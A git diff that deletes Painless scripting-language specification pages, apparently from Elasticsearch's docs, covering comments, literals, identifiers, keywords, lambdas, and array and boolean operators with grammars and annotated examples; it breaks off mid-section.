- | @ -| def as byte/Byte | I | - | - | - | I | I | E | I | I | I | I | - | I | I | E | I | I | I | I | @ -| def as short/Short | I | - | - | - | E | I | E | I | I | I | I | - | E | I | E | I | I | I | I | @ -| def as char/Character | I | - | - | - | E | E | I | I | I | I | I | - | E | E | I | I | I | I | I | @ -| def as int/Integer | I | - | - | - | E | E | E | I | I | I | I | - | E | E | E | I | I | I | I | @ -| def as long/Long | I | - | - | - | E | E | E | E | I | I | I | - | E | E | E | E | I | I | I | @ -| def as float/Float | I | - | - | - | E | E | E | E | E | I | I | - | E | E | E | E | E | I | I | @ -| def as double/Double | I | - | - | - | E | E | E | E | E | E | I | - | E | E | E | E | E | E | I | @ -| def as Reference | @ | @ | @ | - | - | - | - | - | - | - | - | @ | @ | @ | @ | @ | @ | @ | @ | @ -|==== diff --git a/docs/painless/painless-lang-spec/painless-comments.asciidoc b/docs/painless/painless-lang-spec/painless-comments.asciidoc deleted file mode 100644 index bfd3594431e..00000000000 --- a/docs/painless/painless-lang-spec/painless-comments.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ -[[painless-comments]] -=== Comments - -Use a comment to annotate or explain code within a script. Use the `//` token -anywhere on a line to specify a single-line comment. All characters from the -`//` token to the end of the line are ignored. Use an opening `/*` token and a -closing `*/` token to specify a multi-line comment. Multi-line comments can -start anywhere on a line, and all characters in between the `/*` token and `*/` -token are ignored. A comment is included anywhere within a script. - -*Grammar* - -[source,ANTLR4] ----- -SINGLE_LINE_COMMENT: '//' .*? [\n\r]; -MULTI_LINE_COMMENT: '/*' .*? '*/'; ----- - -*Examples* - -* Single-line comments. -+ -[source,Painless] ----- -// single-line comment - -int value; // single-line comment ----- -+ -* Multi-line comments. -+ -[source,Painless] ----- -/* multi- - line - comment */ - -int value; /* multi- - line - comment */ value = 0; - -int value; /* multi-line - comment */ - -/* multi-line - comment */ int value; - -int value; /* multi-line - comment */ value = 0; - -int value; /* multi-line comment */ value = 0; ----- diff --git a/docs/painless/painless-lang-spec/painless-functions.asciidoc b/docs/painless/painless-lang-spec/painless-functions.asciidoc deleted file mode 100644 index 20f3e821f1e..00000000000 --- a/docs/painless/painless-lang-spec/painless-functions.asciidoc +++ /dev/null @@ -1,24 +0,0 @@ -[[painless-functions]] -=== Functions - -A function is a named piece of code comprised of one-to-many statements to -perform a specific task. A function is called multiple times in a single script -to repeat its specific task. A parameter is a named type value available as a -<> within the statement(s) of a function. A -function specifies zero-to-many parameters, and when a function is called a -value is specified per parameter. An argument is a value passed into a function -at the point of call. A function specifies a return type value, though if the -type is <> then no value is returned. Any non-void type return -value is available for use within an <> or is -discarded otherwise. - -You can declare functions at the beginning of a Painless script, for example: - -[source,painless] ---------------------------------------------------------- -boolean isNegative(def x) { x < 0 } -... -if (isNegative(someVar)) { - ... -} ---------------------------------------------------------- \ No newline at end of file diff --git a/docs/painless/painless-lang-spec/painless-identifiers.asciidoc b/docs/painless/painless-lang-spec/painless-identifiers.asciidoc deleted file mode 100644 index d2678b528ea..00000000000 --- a/docs/painless/painless-lang-spec/painless-identifiers.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ -[[painless-identifiers]] -=== Identifiers - -Use an identifier as a named token to specify a -<>, <>, -<>, <>, or -<>. - -*Errors* - -If a <> is used as an identifier. - -*Grammar* -[source,ANTLR4] ----- -ID: [_a-zA-Z] [_a-zA-Z-0-9]*; ----- - -*Examples* - -* Variations of identifiers. -+ -[source,Painless] ----- -a -Z -id -list -list0 -MAP25 -_map25 -Map_25 ----- diff --git a/docs/painless/painless-lang-spec/painless-keywords.asciidoc b/docs/painless/painless-lang-spec/painless-keywords.asciidoc deleted file mode 100644 index 24371d3713c..00000000000 --- a/docs/painless/painless-lang-spec/painless-keywords.asciidoc +++ /dev/null @@ -1,17 +0,0 @@ -[[painless-keywords]] -=== Keywords - -Keywords are reserved tokens for built-in language features. - -*Errors* - -* If a keyword is used as an <>. - -*Keywords* - -[cols="^1,^1,^1,^1,^1"] -|==== -| if | else | while | do | for -| in | continue | break | return | new -| try | catch | throw | this | instanceof -|==== diff --git a/docs/painless/painless-lang-spec/painless-lambdas.asciidoc b/docs/painless/painless-lang-spec/painless-lambdas.asciidoc deleted file mode 100644 index e6694229a0c..00000000000 --- a/docs/painless/painless-lang-spec/painless-lambdas.asciidoc +++ /dev/null @@ -1,15 +0,0 @@ -[[painless-lambdas]] -=== Lambdas -Lambda expressions and method references work the same as in https://docs.oracle.com/javase/tutorial/java/javaOO/lambdaexpressions.html[Java]. - -[source,painless] ---------------------------------------------------------- -list.removeIf(item -> item == 2); -list.removeIf((int item) -> item == 2); -list.removeIf((int item) -> { item == 2 }); -list.sort((x, y) -> x - y); -list.sort(Integer::compare); ---------------------------------------------------------- - -You can make method references to functions within the script with `this`, -for example `list.sort(this::mycompare)`. \ No newline at end of file diff --git a/docs/painless/painless-lang-spec/painless-literals.asciidoc b/docs/painless/painless-lang-spec/painless-literals.asciidoc deleted file mode 100644 index f2e58496380..00000000000 --- a/docs/painless/painless-lang-spec/painless-literals.asciidoc +++ /dev/null @@ -1,125 +0,0 @@ -[[painless-literals]] -=== Literals - -Use a literal to specify a value directly in an -<>. - -[[integer-literals]] -==== Integers - -Use an integer literal to specify an integer type value in decimal, octal, or -hex notation of a <> `int`, `long`, `float`, -or `double`. Use the following single letter designations to specify the -primitive type: `l` or `L` for `long`, `f` or `F` for `float`, and `d` or `D` -for `double`. If not specified, the type defaults to `int`. Use `0` as a prefix -to specify an integer literal as octal, and use `0x` or `0X` as a prefix to -specify an integer literal as hex. - -*Grammar* - -[source,ANTLR4] ----- -INTEGER: '-'? ( '0' | [1-9] [0-9]* ) [lLfFdD]?; -OCTAL: '-'? '0' [0-7]+ [lL]?; -HEX: '-'? '0' [xX] [0-9a-fA-F]+ [lL]?; ----- - -*Examples* - -* Integer literals. -+ -[source,Painless] ----- -0 <1> -0D <2> -1234L <3> --90f <4> --022 <5> -0xF2A <6> ----- -+ -<1> `int 0` -<2> `double 0.0` -<3> `long 1234` -<4> `float -90.0` -<5> `int -18` in octal -<6> `int 3882` in hex - -[[float-literals]] -==== Floats - -Use a floating point literal to specify a floating point type value of a -<> `float` or `double`. Use the following -single letter designations to specify the primitive type: `f` or `F` for `float` -and `d` or `D` for `double`. If not specified, the type defaults to `double`. - -*Grammar* - -[source,ANTLR4] ----- -DECIMAL: '-'? ( '0' | [1-9] [0-9]* ) (DOT [0-9]+)? EXPONENT? [fFdD]?; -EXPONENT: ( [eE] [+\-]? [0-9]+ ); ----- - -*Examples* - -* Floating point literals. -+ -[source,Painless] ----- -0.0 <1> -1E6 <2> -0.977777 <3> --126.34 <4> -89.9F <5> ----- -+ -<1> `double 0.0` -<2> `double 1000000.0` in exponent notation -<3> `double 0.977777` -<4> `double -126.34` -<5> `float 89.9` - -[[string-literals]] -==== Strings - -Use a string literal to specify a <> value with -either single-quotes or double-quotes. Use a `\"` token to include a -double-quote as part of a double-quoted string literal. Use a `\'` token to -include a single-quote as part of a single-quoted string literal. Use a `\\` -token to include a backslash as part of any string literal. - -*Grammar* - -[source,ANTLR4] ----- -STRING: ( '"' ( '\\"' | '\\\\' | ~[\\"] )*? '"' ) - | ( '\'' ( '\\\'' | '\\\\' | ~[\\'] )*? '\'' ); ----- - -*Examples* - -* String literals using single-quotes. -+ -[source,Painless] ----- -'single-quoted string literal' -'\'single-quoted with escaped single-quotes\' and backslash \\' -'single-quoted with non-escaped "double-quotes"' ----- -+ -* String literals using double-quotes. -+ -[source,Painless] ----- -"double-quoted string literal" -"\"double-quoted with escaped double-quotes\" and backslash: \\" -"double-quoted with non-escaped 'single-quotes'" ----- - -[[character-literals]] -==== Characters - -Character literals are not specified directly. Instead, use the -<> to convert a `String` type value -into a `char` type value. diff --git a/docs/painless/painless-lang-spec/painless-operators-array.asciidoc b/docs/painless/painless-lang-spec/painless-operators-array.asciidoc deleted file mode 100644 index ad23a980cb4..00000000000 --- a/docs/painless/painless-lang-spec/painless-operators-array.asciidoc +++ /dev/null @@ -1,294 +0,0 @@ -[[painless-operators-array]] -=== Operators: Array - -[[array-initialization-operator]] -==== Array Initialization - -Use the `array initialization operator '[] {}'` to allocate a single-dimensional -<> instance to the heap with a set of pre-defined -elements. Each value used to initialize an element in the array type instance is -cast to the specified element type value upon insertion. The order of specified -values is maintained. - -*Errors* - -* If a value is not castable to the specified type value. - -*Grammar* - -[source,ANTLR4] ----- -array_initialization: 'new' TYPE '[' ']' '{' expression_list '}' - | 'new' TYPE '[' ']' '{' '}'; -expression_list: expression (',' expression); ----- - -*Example:* - -* Array initialization with static values. -+ -[source,Painless] ----- -int[] x = new int[] {1, 2, 3}; <1> ----- -+ -<1> declare `int[] x`; - allocate `1-d int array` instance with `length [3]` - -> `1-d int array reference`; - store `int 1` to `index [0]` of `1-d int array reference`; - store `int 2` to `index [1]` of `1-d int array reference`; - store `int 3` to `index [2]` of `1-d int array reference`; - store `1-d int array reference` to `x`; -+ -* Array initialization with non-static values. -+ -[source,Painless] ----- -int i = 1; <1> -long l = 2L; <2> -float f = 3.0F; <3> -double d = 4.0; <4> -String s = "5"; <5> -def array = new def[] {i, l, f*d, s}; <6> ----- -+ -<1> declare `int i`; - store `int 1` to `i` -<2> declare `long l`; - store `long 2` to `l` -<3> declare `float f`; - store `float 3.0` to `f` -<4> declare `double d`; - store `double 4.0` to `d` -<5> declare `String s`; - store `String "5"` to `s` -<6> declare `def array`; - allocate `1-d def array` instance with `length [4]` - -> `1-d def array reference`; - load from `i` -> `int 1`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `index [0]` of `1-d def array reference`; - load from `l` -> `long 2`; - implicit cast `long 2` to `def` -> `def`; - store `def` to `index [1]` of `1-d def array reference`; - load from `f` -> `float 3.0`; - load from `d` -> `double 4.0`; - promote `float 3.0` and `double 4.0`: result `double`; - implicit cast `float 3.0` to `double 3.0` -> `double 3.0`; - multiply `double 3.0` and `double 4.0` -> `double 12.0`; - implicit cast `double 12.0` to `def` -> `def`; - store `def` to `index [2]` of `1-d def array reference`; - load from `s` -> `String "5"`; - implicit cast `String "5"` to `def` -> `def`; - store `def` to `index [3]` of `1-d def array reference`; - implicit cast `1-d int array reference` to `def` -> `def`; - store `def` to `array` - -[[array-access-operator]] -==== Array Access - -Use the `array access operator '[]'` to store a value to or load a value from -an <> value. Each element of an array type value is -accessed with an `int` type value to specify the index to store/load. The range -of elements within an array that are accessible is `[0, size)` where size is the -number of elements specified at the time of allocation. Use a negative `int` -type value as an index to access an element in reverse from the end of an array -type value within a range of `[-size, -1]`. - -*Errors* - -* If a value other than an `int` type value or a value that is castable to an - `int` type value is provided as an index. -* If an element is accessed outside of the valid ranges. - -*Grammar* - -[source,ANTLR4] ----- -brace_access: '[' expression ']' ----- - -*Examples* - -* Array access with a single-dimensional array. -+ -[source,Painless] ----- -int[] x = new int[2]; <1> -x[0] = 2; <2> -x[1] = 5; <3> -int y = x[0] + x[1]; <4> -int z = 1; <5> -int i = x[z]; <6> ----- -+ -<1> declare `int[] x`; - allocate `1-d int array` instance with `length [2]` - -> `1-d int array reference`; - store `1-d int array reference` to `x` -<2> load from `x` -> `1-d int array reference`; - store `int 2` to `index [0]` of `1-d int array reference`; -<3> load from `x` -> `1-d int array reference`; - store `int 5` to `index [1]` of `1-d int array reference`; -<4> declare `int y`; - load from `x` -> `1-d int array reference`; - load from `index [0]` of `1-d int array reference` -> `int 2`; - load from `x` -> `1-d int array reference`; - load from `index [1]` of `1-d int array reference` -> `int 5`; - add `int 2` and `int 5` -> `int 7`; - store `int 7` to `y` -<5> declare `int z`; - store `int 1` to `z`; -<6> declare `int i`; - load from `x` -> `1-d int array reference`; - load from `z` -> `int 1`; - load from `index [1]` of `1-d int array reference` -> `int 5`; - store `int 5` to `i`; -+ -* Array access with the `def` type. -+ -[source,Painless] ----- -def d = new int[2]; <1> -d[0] = 2; <2> -d[1] = 5; <3> -def x = d[0] + d[1]; <4> -def y = 1; <5> -def z = d[y]; <6> ----- -+ -<1> declare `def d`; - allocate `1-d int array` instance with `length [2]` - -> `1-d int array reference`; - implicit cast `1-d int array reference` to `def` -> `def`; - store `def` to `d` -<2> load from `d` -> `def` - implicit cast `def` to `1-d int array reference` - -> `1-d int array reference`; - store `int 2` to `index [0]` of `1-d int array reference`; -<3> load from `d` -> `def` - implicit cast `def` to `1-d int array reference` - -> `1-d int array reference`; - store `int 5` to `index [1]` of `1-d int array reference`; -<4> declare `int x`; - load from `d` -> `def` - implicit cast `def` to `1-d int array reference` - -> `1-d int array reference`; - load from `index [0]` of `1-d int array reference` -> `int 2`; - load from `d` -> `def` - implicit cast `def` to `1-d int array reference` - -> `1-d int array reference`; - load from `index [1]` of `1-d int array reference` -> `int 5`; - add `int 2` and `int 5` -> `int 7`; - implicit cast `int 7` to `def` -> `def`; - store `def` to `x` -<5> declare `def y`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `y`; -<6> declare `int i`; - load from `d` -> `def` - implicit cast `def` to `1-d int array reference` - -> `1-d int array reference`; - load from `y` -> `def`; - implicit cast `def` to `int 1` -> `int 1`; - load from `index [1]` of `1-d int array reference` -> `int 5`; - implicit cast `int 5` to `def`; - store `def` to `z`; -+ -* Array access with a multi-dimensional array. -+ -[source,Painless] ----- -int[][][] ia3 = new int[2][3][4]; <1> -ia3[1][2][3] = 99; <2> -int i = ia3[1][2][3]; <3> ----- -+ -<1> declare `int[][][] ia`; - allocate `3-d int array` instance with length `[2, 3, 4]` - -> `3-d int array reference`; - store `3-d int array reference` to `ia3` -<2> load from `ia3` -> `3-d int array reference`; - store `int 99` to `index [1, 2, 3]` of `3-d int array reference` -<3> declare `int i`; - load from `ia3` -> `3-d int array reference`; - load from `index [1, 2, 3]` of `3-d int array reference` -> `int 99`; - store `int 99` to `i` - -[[array-length-operator]] -==== Array Length - -An array type value contains a read-only member field named `length`. The -`length` field stores the size of the array as an `int` type value where size is -the number of elements specified at the time of allocation. Use the -<> to load the field `length` -from an array type value. - -*Examples* - -* Access the `length` field. -+ -[source,Painless] ----- -int[] x = new int[10]; <1> -int l = x.length; <2> ----- -<1> declare `int[] x`; - allocate `1-d int array` instance with `length [2]` - -> `1-d int array reference`; - store `1-d int array reference` to `x` -<2> declare `int l`; - load `x` -> `1-d int array reference`; - load `length` from `1-d int array reference` -> `int 10`; - store `int 10` to `l`; - -[[new-array-operator]] -==== New Array - -Use the `new array operator 'new []'` to allocate an array type instance to -the heap. Specify the element type following the `new` token. Specify each -dimension with the `[` and `]` tokens following the element type name. The size -of each dimension is specified by an `int` type value in between each set of `[` -and `]` tokens. - -*Errors* - -* If a value other than an `int` type value or a value that is castable to an - `int` type value is specified for a dimension's size. - -*Grammar* - -[source,ANTLR4] ----- -new_array: 'new' TYPE ('[' expression ']')+; ----- - -*Examples* - -* Allocation of different array types. -+ -[source,Painless] ----- -int[] x = new int[5]; <1> -x = new int[10]; <2> -int y = 2; <3> -def z = new def[y][y*2]; <4> ----- -+ -<1> declare `int[] x`; - allocate `1-d int array` instance with `length [5]` - -> `1-d int array reference`; - store `1-d int array reference` to `x` -<2> allocate `1-d int array` instance with `length [10]` - -> `1-d int array reference`; - store `1-d int array reference` to `x` -<3> declare `int y`; - store `int 2` to `y`; -<4> declare `def z`; - load from `y` -> `int 2 @0`; - load from `y` -> `int 2 @1`; - multiply `int 2 @1` by `int 2 @2` -> `int 4`; - allocate `2-d int array` instance with length `[2, 4]` - -> `2-d int array reference`; - implicit cast `2-d int array reference` to `def` -> `def`; - store `def` to `z`; diff --git a/docs/painless/painless-lang-spec/painless-operators-boolean.asciidoc b/docs/painless/painless-lang-spec/painless-operators-boolean.asciidoc deleted file mode 100644 index 6f9481aa4ec..00000000000 --- a/docs/painless/painless-lang-spec/painless-operators-boolean.asciidoc +++ /dev/null @@ -1,1420 +0,0 @@ -[[painless-operators-boolean]] -=== Operators: Boolean - -[[boolean-not-operator]] -==== Boolean Not - -Use the `boolean not operator '!'` to NOT a `boolean` type value where `true` is -flipped to `false` and `false` is flipped to `true`. - -*Errors* - -* If a value other than a `boolean` type value or a value that is castable to a - `boolean` type value is given. - -*Truth* - -[options="header",cols="<1,<1"] -|==== -| original | result -| true | false -| false | true -|==== - -*Grammar* - -[source,ANTLR4] ----- -boolean_not: '!' expression; ----- - -*Examples* - -* Boolean not with the `boolean` type. -+ -[source,Painless] ----- -boolean x = !false; <1> -boolean y = !x; <2> ----- -<1> declare `boolean x`; - boolean not `boolean false` -> `boolean true`; - store `boolean true` to `x` -<2> declare `boolean y`; - load from `x` -> `boolean true`; - boolean not `boolean true` -> `boolean false`; - store `boolean false` to `y` -+ -* Boolean not with the `def` type. -+ -[source,Painless] ----- -def y = true; <1> -def z = !y; <2> ----- -+ -<1> declare `def y`; - implicit cast `boolean true` to `def` -> `def`; - store `true` to `y` -<2> declare `def z`; - load from `y` -> `def`; - implicit cast `def` to `boolean true` -> boolean `true`; - boolean not `boolean true` -> `boolean false`; - implicit cast `boolean false` to `def` -> `def`; - store `def` to `z` - -[[greater-than-operator]] -==== Greater Than - -Use the `greater than operator '>'` to COMPARE two numeric type values where a -resultant `boolean` type value is `true` if the left-hand side value is greater -than to the right-hand side value and `false` otherwise. - -*Errors* - -* If either the evaluated left-hand side or the evaluated right-hand side is a - non-numeric value. - -*Grammar* - -[source,ANTLR4] ----- -greater_than: expression '>' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | float | double | def -| byte | int | int | int | int | long | float | double | def -| short | int | int | int | int | long | float | double | def -| char | int | int | int | int | long | float | double | def -| int | int | int | int | int | long | float | double | def -| long | long | long | long | long | long | float | double | def -| float | float | float | float | float | float | float | double | def -| double | double | double | double | double | double | double | double | def -| def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Greater than with different numeric types. -+ -[source,Painless] ----- -boolean x = 5 > 4; <1> -double y = 6.0; <2> -x = 6 > y; <3> ----- -+ -<1> declare `boolean x`; - greater than `int 5` and `int 4` -> `boolean true`; - store `boolean true` to `x`; -<2> declare `double y`; - store `double 6.0` to `y`; -<3> load from `y` -> `double 6.0 @0`; - promote `int 6` and `double 6.0`: result `double`; - implicit cast `int 6` to `double 6.0 @1` -> `double 6.0 @1`; - greater than `double 6.0 @1` and `double 6.0 @0` -> `boolean false`; - store `boolean false` to `x` -+ -* Greater than with `def` type. -+ -[source,Painless] ----- -int x = 5; <1> -def y = 7.0; <2> -def z = y > 6.5; <3> -def a = x > y; <4> ----- -+ -<1> declare `int x`; - store `int 5` to `x` -<2> declare `def y`; - implicit cast `double 7.0` to `def` -> `def`; - store `def` to `y` -<3> declare `def z`; - load from `y` -> `def`; - implicit cast `def` to `double 7.0` -> `double 7.0`; - greater than `double 7.0` and `double 6.5` -> `boolean true`; - implicit cast `boolean true` to `def` -> `def`; - store `def` to `z` -<4> declare `def a`; - load from `y` -> `def`; - implicit cast `def` to `double 7.0` -> `double 7.0`; - load from `x` -> `int 5`; - promote `int 5` and `double 7.0`: result `double`; - implicit cast `int 5` to `double 5.0` -> `double 5.0`; - greater than `double 5.0` and `double 7.0` -> `boolean false`; - implicit cast `boolean false` to `def` -> `def`; - store `def` to `z` - -[[greater-than-or-equal-operator]] -==== Greater Than Or Equal - -Use the `greater than or equal operator '>='` to COMPARE two numeric type values -where a resultant `boolean` type value is `true` if the left-hand side value is -greater than or equal to the right-hand side value and `false` otherwise. - -*Errors* - -* If either the evaluated left-hand side or the evaluated right-hand side is a - non-numeric value. - -*Grammar* - -[source,ANTLR4] ----- -greater_than_or_equal: expression '>=' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | float | double | def -| byte | int | int | int | int | long | float | double | def -| short | int | int | int | int | long | float | double | def -| char | int | int | int | int | long | float | double | def -| int | int | int | int | int | long | float | double | def -| long | long | long | long | long | long | float | double | def -| float | float | float | float | float | float | float | double | def -| double | double | double | double | double | double | double | double | def -| def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Greater than or equal with different numeric types. -+ -[source,Painless] ----- -boolean x = 5 >= 4; <1> -double y = 6.0; <2> -x = 6 >= y; <3> ----- -+ -<1> declare `boolean x`; - greater than or equal `int 5` and `int 4` -> `boolean true`; - store `boolean true` to `x` -<2> declare `double y`; - store `double 6.0` to `y` -<3> load from `y` -> `double 6.0 @0`; - promote `int 6` and `double 6.0`: result `double`; - implicit cast `int 6` to `double 6.0 @1` -> `double 6.0 @1`; - greater than or equal `double 6.0 @1` and `double 6.0 @0` -> `boolean true`; - store `boolean true` to `x` -+ -* Greater than or equal with the `def` type. -+ -[source,Painless] ----- -int x = 5; <1> -def y = 7.0; <2> -def z = y >= 7.0; <3> -def a = x >= y; <4> ----- -+ -<1> declare `int x`; - store `int 5` to `x`; -<2> declare `def y` - implicit cast `double 7.0` to `def` -> `def`; - store `def` to `y` -<3> declare `def z`; - load from `y` -> `def`; - implicit cast `def` to `double 7.0 @0` -> `double 7.0 @0`; - greater than or equal `double 7.0 @0` and `double 7.0 @1` -> `boolean true`; - implicit cast `boolean true` to `def` -> `def`; - store `def` to `z` -<4> declare `def a`; - load from `y` -> `def`; - implicit cast `def` to `double 7.0` -> `double 7.0`; - load from `x` -> `int 5`; - promote `int 5` and `double 7.0`: result `double`; - implicit cast `int 5` to `double 5.0` -> `double 5.0`; - greater than or equal `double 5.0` and `double 7.0` -> `boolean false`; - implicit cast `boolean false` to `def` -> `def`; - store `def` to `z` - -[[less-than-operator]] -==== Less Than - -Use the `less than operator '<'` to COMPARE two numeric type values where a -resultant `boolean` type value is `true` if the left-hand side value is less -than to the right-hand side value and `false` otherwise. - -*Errors* - -* If either the evaluated left-hand side or the evaluated right-hand side is a - non-numeric value. - -*Grammar* - -[source,ANTLR4] ----- -less_than: expression '<' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | float | double | def -| byte | int | int | int | int | long | float | double | def -| short | int | int | int | int | long | float | double | def -| char | int | int | int | int | long | float | double | def -| int | int | int | int | int | long | float | double | def -| long | long | long | long | long | long | float | double | def -| float | float | float | float | float | float | float | double | def -| double | double | double | double | double | double | double | double | def -| def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Less than with different numeric types. -+ -[source,Painless] ----- -boolean x = 5 < 4; <1> -double y = 6.0; <2> -x = 6 < y; <3> ----- -+ -<1> declare `boolean x`; - less than `int 5` and `int 4` -> `boolean false`; - store `boolean false` to `x` -<2> declare `double y`; - store `double 6.0` to `y` -<3> load from `y` -> `double 6.0 @0`; - promote `int 6` and `double 6.0`: result `double`; - implicit cast `int 6` to `double 6.0 @1` -> `double 6.0 @1`; - less than `double 6.0 @1` and `double 6.0 @0` -> `boolean false`; - store `boolean false` to `x` -+ -* Less than with the `def` type. -+ -[source,Painless] ----- -int x = 5; <1> -def y = 7.0; <2> -def z = y < 6.5; <3> -def a = x < y; <4> ----- -+ -<1> declare `int x`; - store `int 5` to `x` -<2> declare `def y`; - implicit cast `double 7.0` to `def` -> `def`; - store `def` to `y` -<3> declare `def z`; - load from `y` -> `def`; - implicit cast `def` to `double 7.0` -> `double 7.0`; - less than `double 7.0` and `double 6.5` -> `boolean false`; - implicit cast `boolean false` to `def` -> `def`; - store `def` to `z` -<4> declare `def a`; - load from `y` -> `def`; - implicit cast `def` to `double 7.0` -> `double 7.0`; - load from `x` -> `int 5`; - promote `int 5` and `double 7.0`: result `double`; - implicit cast `int 5` to `double 5.0` -> `double 5.0`; - less than `double 5.0` and `double 7.0` -> `boolean true`; - implicit cast `boolean true` to `def` -> `def`; - store `def` to `z` - -[[less-than-or-equal-operator]] -==== Less Than Or Equal - -Use the `less than or equal operator '<='` to COMPARE two numeric type values -where a resultant `boolean` type value is `true` if the left-hand side value is -less than or equal to the right-hand side value and `false` otherwise. - -*Errors* - -* If either the evaluated left-hand side or the evaluated right-hand side is a - non-numeric value. - -*Grammar* - -[source,ANTLR4] ----- -greater_than_or_equal: expression '<=' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | float | double | def -| byte | int | int | int | int | long | float | double | def -| short | int | int | int | int | long | float | double | def -| char | int | int | int | int | long | float | double | def -| int | int | int | int | int | long | float | double | def -| long | long | long | long | long | long | float | double | def -| float | float | float | float | float | float | float | double | def -| double | double | double | double | double | double | double | double | def -| def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Less than or equal with different numeric types. -+ -[source,Painless] ----- -boolean x = 5 <= 4; <1> -double y = 6.0; <2> -x = 6 <= y; <3> ----- -+ -<1> declare `boolean x`; - less than or equal `int 5` and `int 4` -> `boolean false`; - store `boolean true` to `x` -<2> declare `double y`; - store `double 6.0` to `y` -<3> load from `y` -> `double 6.0 @0`; - promote `int 6` and `double 6.0`: result `double`; - implicit cast `int 6` to `double 6.0 @1` -> `double 6.0 @1`; - less than or equal `double 6.0 @1` and `double 6.0 @0` -> `boolean true`; - store `boolean true` to `x` -+ -* Less than or equal with the `def` type. -+ -[source,Painless] ----- -int x = 5; <1> -def y = 7.0; <2> -def z = y <= 7.0; <3> -def a = x <= y; <4> ----- -+ -<1> declare `int x`; - store `int 5` to `x`; -<2> declare `def y`; - implicit cast `double 7.0` to `def` -> `def`; - store `def` to `y`; -<3> declare `def z`; - load from `y` -> `def`; - implicit cast `def` to `double 7.0 @0` -> `double 7.0 @0`; - less than or equal `double 7.0 @0` and `double 7.0 @1` -> `boolean true`; - implicit cast `boolean true` to `def` -> `def`; - store `def` to `z` -<4> declare `def a`; - load from `y` -> `def`; - implicit cast `def` to `double 7.0` -> `double 7.0`; - load from `x` -> `int 5`; - promote `int 5` and `double 7.0`: result `double`; - implicit cast `int 5` to `double 5.0` -> `double 5.0`; - less than or equal `double 5.0` and `double 7.0` -> `boolean true`; - implicit cast `boolean true` to `def` -> `def`; - store `def` to `z` - -[[instanceof-operator]] -==== Instanceof - -Use the `instanceof operator` to COMPARE the variable/field type to a -specified reference type using the reference type name where a resultant -`boolean` type value is `true` if the variable/field type is the same as or a -descendant of the specified reference type and false otherwise. - -*Errors* - -* If the reference type name doesn't exist as specified by the right-hand side. - -*Grammar* - -[source,ANTLR4] ----- -instance_of: ID 'instanceof' TYPE; ----- - -*Examples* - -* Instance of with different reference types. -+ -[source,Painless] ----- -Map m = new HashMap(); <1> -boolean a = m instanceof HashMap; <2> -boolean b = m instanceof Map; <3> ----- -+ -<1> declare `Map m`; - allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `Map reference`; - store `Map reference` to `m` -<2> declare `boolean a`; - load from `m` -> `Map reference`; - implicit cast `Map reference` to `HashMap reference` -> `HashMap reference`; - instanceof `HashMap reference` and `HashMap` -> `boolean true`; - store `boolean true` to `a` -<3> declare `boolean b`; - load from `m` -> `Map reference`; - implicit cast `Map reference` to `HashMap reference` -> `HashMap reference`; - instanceof `HashMap reference` and `Map` -> `boolean true`; - store `true` to `b`; - (note `HashMap` is a descendant of `Map`) -+ -* Instance of with the `def` type. -+ -[source,Painless] ----- -def d = new ArrayList(); <1> -boolean a = d instanceof List; <2> -boolean b = d instanceof Map; <3> ----- -+ -<1> declare `def d`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `def` -> `def`; - store `def` to `d` -<2> declare `boolean a`; - load from `d` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - instanceof `ArrayList reference` and `List` -> `boolean true`; - store `boolean true` to `a`; - (note `ArrayList` is a descendant of `List`) -<3> declare `boolean b`; - load from `d` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - instanceof `ArrayList reference` and `Map` -> `boolean false`; - store `boolean false` to `a`; - (note `ArrayList` is not a descendant of `Map`) - -[[equality-equals-operator]] -==== Equality Equals - -Use the `equality equals operator '=='` to COMPARE two values where a resultant -`boolean` type value is `true` if the two values are equal and `false` -otherwise. The member method, `equals`, is implicitly called when the values are -reference type values where the first value is the target of the call and the -second value is the argument. This operation is null-safe where if both values -are `null` the resultant `boolean` type value is `true`, and if only one value -is `null` the resultant `boolean` type value is `false`. A valid comparison is -between `boolean` type values, numeric type values, or reference type values. - -*Errors* - -* If a comparison is made between a `boolean` type value and numeric type value. -* If a comparison is made between a primitive type value and a reference type - value. - -*Grammar* - -[source,ANTLR4] ----- -equality_equals: expression '==' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | boolean | byte | short | char | int | long | float | double | Reference | def -| boolean | boolean | - | - | - | - | - | - | - | - | def -| byte | - | int | int | int | int | long | float | double | - | def -| short | - | int | int | int | int | long | float | double | - | def -| char | - | int | int | int | int | long | float | double | - | def -| int | - | int | int | int | int | long | float | double | - | def -| long | - | long | long | long | long | long | float | double | - | def -| float | - | float | float | float | float | float | float | double | - | def -| double | - | double | double | double | double | double | double | double | - | def -| Reference | - | - | - | - | - | - | - | - | Object | def -| def | def | def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Equality equals with the `boolean` type. -+ -[source,Painless] ----- -boolean a = true; <1> -boolean b = false; <2> -a = a == false; <3> -b = a == b; <4> ----- -+ -<1> declare `boolean a`; - store `boolean true` to `a` -<2> declare `boolean b`; - store `boolean false` to `b` -<3> load from `a` -> `boolean true`; - equality equals `boolean true` and `boolean false` -> `boolean false`; - store `boolean false` to `a` -<4> load from `a` -> `boolean false @0`; - load from `b` -> `boolean false @1`; - equality equals `boolean false @0` and `boolean false @1` - -> `boolean false`; - store `boolean false` to `b` -+ -* Equality equals with primitive types. -+ 